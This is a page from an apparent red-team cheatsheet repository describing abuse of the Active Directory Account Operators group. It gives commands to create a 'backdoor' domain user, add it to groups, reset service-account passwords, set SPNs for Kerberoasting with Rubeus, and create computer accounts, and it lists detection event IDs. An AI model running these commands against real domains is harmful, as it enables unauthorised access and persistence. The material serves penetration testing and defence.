daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-50-abusing-account-operators-group.md (3111B)


      1 ---
      2 title: "Attack #50 โ€” Abusing Account Operators Group"
      3 description: "net user backdoor P@ssword123! /add /domain"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "kerberos", "sql-injection", "pivoting"]
      7 tools: ["Rubeus", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ŸŸฃ Attack #50 โ€” Abusing Account Operators Group.md"
     11 ---
     12 # ๐ŸŸฃ Attack #50 โ€” Abusing Account Operators Group
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 **Account Operators** can create, modify, and delete most user and group accounts in the domain (excluding protected admin accounts). They can also log on to Domain Controllers locally. An Account Operator can create a new user and add it to non-protected groups, modify existing service accounts, or reset passwords on non-admin users to pivot deeper.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in Account Operators** | Can manage most domain accounts |
     27 
     28 ***
     29 
     30 ## ๐Ÿ’ป Full Commands
     31 
     32 ```powershell
     33 # โ”€โ”€ Create new user โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     34 net user backdoor P@ssword123! /add /domain
     35 
     36 # โ”€โ”€ Add to groups (non-protected) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     37 net group "SQL Admins" backdoor /add /domain
     38 net group "Remote Desktop Users" backdoor /add /domain
     39 # โš ๏ธ Cannot add to DA/EA/Schema Admins (protected by AdminSDHolder)
     40 
     41 # โ”€โ”€ Reset non-admin user passwords โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     42 net user svc_backup NewP@ss123! /domain
     43 
     44 # โ”€โ”€ Modify service accounts (set SPN for Kerberoasting) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     45 Set-DomainObject -Identity svc_target -Set @{serviceprincipalname='fake/kerbroast'}
     46 .\Rubeus.exe kerberoast /user:svc_target
     47 
     48 # โ”€โ”€ Create computer account (bypass MAQ) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     49 New-ADComputer -Name "FAKE01" -SamAccountName "FAKE01$" -Enabled $true
     50 ```
     51 
     52 ***
     53 
     54 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     55 
     56 | Event ID | Source | What to Look For |
     57 |---|---|---|
     58 | **4720** | Security Log (DC) | User account created |
     59 | **4728/4732** | Security Log (DC) | User added to group |
     60 | **4724** | Security Log (DC) | Password reset |
     61 
     62 ***
     63 
     64 ## ๐Ÿ”— Attack Chain Context
     65 
     66 ```
     67 [Account Operators] โ”€โ”€โ†’ Create/modify accounts โ†’ pivot deeper
     68          โ”‚
     69          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Reset service account passwords โ†’ access databases/services
     70          โ”œโ”€โ”€โ†’ ๐ŸŽซ Set SPNs โ†’ targeted Kerberoasting (#2)
     71          โ”œโ”€โ”€โ†’ ๐Ÿ’ป Create computer accounts โ†’ RBCD (#17)
     72          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: minimize Account Operators membership
     73 ```
     74 
     75 ***
     76 
     77 > โœ… **Attack #50 โ€” Account Operators complete.**